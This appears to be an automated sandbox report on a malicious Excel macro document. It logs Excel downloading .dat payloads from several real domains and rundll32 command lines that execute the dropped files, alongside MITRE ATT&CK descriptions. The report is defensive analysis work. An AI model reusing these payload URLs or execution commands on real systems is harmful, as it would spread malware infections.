Feb 24, 2021 11:54:17.745513916 CET	61200	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:17.797508955 CET	53	61200	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:17.805962086 CET	49548	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:17.857635975 CET	53	49548	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:18.077522039 CET	55627	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:18.126564026 CET	53	55627	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:18.146034956 CET	56009	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:18.198153973 CET	53	56009	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:18.511854887 CET	61865	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:18.563889980 CET	53	61865	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:18.577310085 CET	55171	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:18.626219988 CET	53	55171	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:21.980869055 CET	52496	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:22.141863108 CET	53	52496	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2021 11:54:13.501976013 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	rzminc.com	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:14.341540098 CET	192.168.2.22	8.8.8.8	0x437e	Standard query (0)	pathinanchilearthmovers.com	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:15.374135971 CET	192.168.2.22	8.8.8.8	0xb648	Standard query (0)	jugueterialatorre.com.ar	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:17.745513916 CET	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	crt.sectigo.com	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:17.805962086 CET	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	crt.sectigo.com	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:21.980869055 CET	192.168.2.22	8.8.8.8	0xa9f6	Standard query (0)	biblicalisraeltours.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 24, 2021 11:54:13.675236940 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	rzminc.com	72.52.227.180	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:14.498265982 CET	8.8.8.8	192.168.2.22	0x437e	No error (0)	pathinanchilearthmovers.com	162.241.80.6	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:15.749438047 CET	8.8.8.8	192.168.2.22	0xb648	No error (0)	jugueterialatorre.com.ar	138.36.237.100	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:17.797508955 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	crt.sectigo.com	91.199.212.52	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:17.857635975 CET	8.8.8.8	192.168.2.22	0xfc39	No error (0)	crt.sectigo.com	91.199.212.52	A (IP address)	IN (0x0001)
Feb 24, 2021 11:54:22.141863108 CET	8.8.8.8	192.168.2.22	0xa9f6	No error (0)	biblicalisraeltours.com	68.66.216.42	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

rzminc.com

pathinanchilearthmovers.com

jugueterialatorre.com.ar

biblicalisraeltours.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	72.52.227.180	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 11:54:13.848664999 CET	0	OUT	GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: rzminc.com Connection: Keep-Alive
Feb 24, 2021 11:54:14.320781946 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 24 Feb 2021 10:54:13 GMT Server: Apache/2.4.46 (CentOS) X-Powered-By: PHP/7.3.27 Upgrade: h2 Connection: keep-alive, close Cache-Control: private, must-revalidate Expires: Wed, 24 Feb 2021 10:54:13 GMT Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	162.241.80.6	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 11:54:14.660200119 CET	2	OUT	GET /eznwcdhx/44251495573726900000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: pathinanchilearthmovers.com Connection: Keep-Alive
Feb 24, 2021 11:54:15.358295918 CET	2	IN	HTTP/1.1 200 OK Date: Wed, 24 Feb 2021 10:54:14 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Cache-Control: max-age=300 Expires: Wed, 24 Feb 2021 10:59:14 GMT X-Endurance-Cache-Level: 2 Content-Length: 0 Keep-Alive: timeout=5, max=75 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	138.36.237.100	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 11:54:16.042413950 CET	3	OUT	GET /xjzpfwc/44251495573726900000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: jugueterialatorre.com.ar Connection: Keep-Alive
Feb 24, 2021 11:54:16.467619896 CET	4	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 24 Feb 2021 10:54:16 GMT Server: Apache X-Powered-By: PHP/7.3.20 Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=77f179d46abad0720483b69daa2a8633; path=/; secure; HttpOnly Expires: Wed, 17 Aug 2005 00:00:00 GMT Last-Modified: Wed, 24 Feb 2021 10:54:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: https://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49174	72.52.227.180	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 11:54:21.507049084 CET	92	OUT	GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: rzminc.com Connection: Keep-Alive
Feb 24, 2021 11:54:21.965558052 CET	121	IN	HTTP/1.1 200 OK Date: Wed, 24 Feb 2021 10:54:21 GMT Server: Apache/2.4.46 (CentOS) X-Powered-By: PHP/7.3.27 Upgrade: h2 Connection: keep-alive, close Cache-Control: private, must-revalidate Expires: Wed, 24 Feb 2021 10:54:21 GMT Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49175	68.66.216.42	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 11:54:22.296935081 CET	122	OUT	GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: biblicalisraeltours.com Connection: Keep-Alive
Feb 24, 2021 11:54:22.776196003 CET	122	IN	HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/7.4.14 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Wed, 24 Feb 2021 10:54:22 GMT Server: LiteSpeed Strict-Transport-Security: max-age=63072000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: upgrade-insecure-requests X-XSS-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 24, 2021 11:54:17.087672949 CET	138.36.237.100	443	192.168.2.22	49170	CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017	Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Feb 24, 2021 11:54:17.087672949 CET	138.36.237.100	443	192.168.2.22	49170	CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:33 CET 2017	Sat Nov 06 13:23:33 CET 2027		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

Behavior

• EXCEL.EXE
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2516 Parent PID: 584

General

Start time:	11:53:35
Start date:	24/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13ff70000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

General

Start time:	11:53:46
Start date:	24/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr,DllRegisterServer
Imagebase:	0xff3d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Analysis Process: rundll32.exe PID: 2892 Parent PID: 2516

General

Start time:	11:53:47
Start date:	24/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Imagebase:	0xff3d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Analysis Process: rundll32.exe PID: 2876 Parent PID: 2516

General

Start time:	11:53:48
Start date:	24/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Imagebase:	0xff3d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Analysis Process: rundll32.exe PID: 2512 Parent PID: 2516

General

Start time:	11:53:48
Start date:	24/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Imagebase:	0xff3d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Analysis Process: rundll32.exe PID: 3036 Parent PID: 2516

General

Start time:	11:53:49
Start date:	24/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Imagebase:	0xff3d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Disassembly

Code Analysis

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.XF.AShadow.4960.21593.8307

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "SecuriteInfo.com.XF.AShadow.4960.21593.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations